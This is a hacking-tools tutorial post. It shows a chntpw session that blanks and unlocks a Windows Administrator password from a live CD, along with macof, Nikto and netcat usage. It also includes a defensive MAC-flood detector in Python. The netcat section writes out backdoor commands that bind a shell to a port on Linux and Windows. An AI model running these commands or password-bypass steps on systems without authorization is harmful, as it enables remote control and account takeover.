Hacking Topic 2: Common Tools, Part 2

I. chntpw password reset

Personally tested and working on Windows 7/XP/Vista.

1. Boot your system using BackTrack LiveCD.

2. Mount your partition containing Windows.

root@bt:~# fdisk -l
   Device Boot      Start         End      Blocks           Id   System
/dev/sda1   *           1          10683    85811166      83  Linux
/dev/sda2           10684       14762    32764567+   83  Linux
/dev/sda3           14801       56885   338047762+    f  W95 Ext'd (LBA)
/dev/sda4           56886       60801    31455270       7  HPFS/NTFS
/dev/sda5           14802       32664   143484547+   7  HPFS/NTFS
/dev/sda6           32665       56885   194555151    83  Linux

root@bt:~# cd /media; mkdir dex
root@bt:~# mount -t ntfs /dev/sda4 /media/dex
      
Note - /dev/sda4 is the partition containing Windows (Id 7, HPFS/NTFS) and /media/dex is the mount point.

3. Fire up chntpw.

Though it is pretty self-explanatory, here's an example of how to remove the password from an Admin account that is locked.

root@bt:~# cd /pentest/passwords/chntpw/
root@bt:/pentest/passwords/chntpw#
root@bt:/pentest/passwords/chntpw# find /media/dex/ -iname sam
/media/dex/Windows/System32/config/RegBack/SAM
/media/dex/Windows/System32/config/SAM
^C
root@bt:/pentest/passwords/chntpw# ./chntpw -i /media/dex/Windows/System32/config/SAM

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: </media/dex/Windows/System32/config/SAM>

  1 - Edit user data and passwords
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1
===== chntpw Edit User Info & Passwords ====

| RID  |------------- Username -------------| Admin? |- Lock? --|
| 01f4 | Administrator                      | ADMIN  | dis/lock |
| 03e8 | Dexter                             | ADMIN  | dis/lock |
| 01f5 | Guest                              |        | dis/lock |

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] Administrator

- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] Administrator

- - - - User Edit Menu:
 1 - Clear (blank) user password
 2 - Edit (set new) user password (careful with this on XP or Vista)
 3 - Promote user (make user an administrator)
 4 - Unlock and enable user account [probably locked now]
 q - Quit editing user, back to user select
Select: [q] > 4
Unlocked!              [note - this step is important, as the Admin account was locked]

Select: ! - quit, . - list users, 0x<RID> - User with RID (hex)
or simply enter the username to change: [Administrator] !

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: </media/dex/Windows/System32/config/SAM>

  1 - Edit user data and passwords
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)


What to do? [1] -> q


Hives that have changed:
 #  Name
 0  </media/dex/Windows/System32/config/SAM>
Write hive files? (y/n) [n] : y
0  </media/dex/Windows/System32/config/SAM> - OK
root@bt:/pentest/passwords/chntpw# 

II. macof: attacking switches

macof [-i interface] [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-n times] 
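macof floods a switch's CAM table with frames carrying bogus source MAC addresses until the switch falls back to flooding traffic out of every port. The following detector is an added example (not from the original post, and not part of macof or dsniff): it counts distinct source MACs per interface in a sliding window over constructed frame records and alerts when a port shows far more MACs than any real access port should.

```python
from collections import Counter, defaultdict, deque

def detect_mac_flood(frames, window_s=1.0, threshold=50):
    """Scan (timestamp, interface, src_mac) records, sorted by timestamp.

    Returns one (interface, timestamp, distinct_macs) alert per flooding
    episode: the moment the number of distinct source MACs seen on an
    interface within the last window_s seconds first exceeds threshold.
    A healthy access port carries a handful of source MACs; hundreds per
    second is the signature of CAM-table flooding."""
    windows = defaultdict(deque)    # iface -> (ts, mac) still inside the window
    counts = defaultdict(Counter)   # iface -> how often each MAC is in the window
    flooding = defaultdict(bool)    # iface -> already alerted for this episode?
    alerts = []
    for ts, iface, mac in frames:
        win, cnt = windows[iface], counts[iface]
        win.append((ts, mac))
        cnt[mac] += 1
        while win and ts - win[0][0] > window_s:   # expire frames older than the window
            old_ts, old_mac = win.popleft()
            cnt[old_mac] -= 1
            if cnt[old_mac] == 0:
                del cnt[old_mac]
        distinct = len(cnt)
        if distinct > threshold and not flooding[iface]:
            flooding[iface] = True
            alerts.append((iface, ts, distinct))
        elif distinct <= threshold:
            flooding[iface] = False
    return alerts

def constructed_frames():
    """Constructed sample data: normal traffic on eth1, a MAC flood on eth0."""
    frames = []
    hosts = ["aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"]
    for i in range(100):                      # three hosts chatting for 10 s
        frames.append((i * 0.1, "eth1", hosts[i % 3]))
    for i in range(300):                      # 300 distinct bogus MACs within 1 s
        mac = "02:%02x:%02x:%02x:%02x:%02x" % (
            (i * 37) % 256, (i * 59) % 256, (i * 83) % 256, i // 256, i % 256)
        frames.append((5.0 + i / 300.0, "eth0", mac))
    frames.sort()
    return frames

if __name__ == "__main__":
    for iface, ts, n in detect_mac_flood(constructed_frames()):
        print("MAC flood on %s at t=%.2fs: %d distinct source MACs in 1 s" % (iface, ts, n))
```

The same logic runs unchanged over a real capture once frames are reduced to (timestamp, interface, source MAC) tuples; port security with a per-port MAC limit is the switch-side mitigation.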

III. Scanning web servers: Nikto

1. Quick start
To run the most basic nikto scan you only need to specify the target host (with -h); you can also specify the port to scan (with -p), which defaults to 80.
perl nikto.pl -h 192.168.0.1
2. Scanning multiple ports
# scan the three ports 80, 88 and 443
perl nikto.pl -h 192.168.0.1 -p 80,88,443
# scan the whole range 80-90
perl nikto.pl -h 192.168.0.1 -p 80-90

IV. Netcat

Encrypted version: Cryptcat

1. Uploading a file

nc -l -p 7777 > calc.exe        # remote side listens and saves the received data as calc.exe
nc 172.16.24.129 7777 < calc.exe    # local side uploads the file to the listener
2. Determining which service runs on a port

nc 172.16.24.129 50001    # inspect whatever banner the service returns

3. Creating a backdoor

nc -l -p 12345 -e /bin/sh                          # linux
nc.exe -L -p 12345 -e c:\windows\system32\cmd.exe  # windows

V. tcpdump

Text-mode Wireshark; effective for working through huge volumes of data.

VI. Cain & Abel

The strongest ARP cache poisoning tool on Windows.

VII. scapy

The most powerful packet-manipulation Python library; Netdude is a graphical scapy.

VIII. hping

Command-line packet manipulation tool.

IX. Tamper Data

Analyzes and modifies HTTP messages.
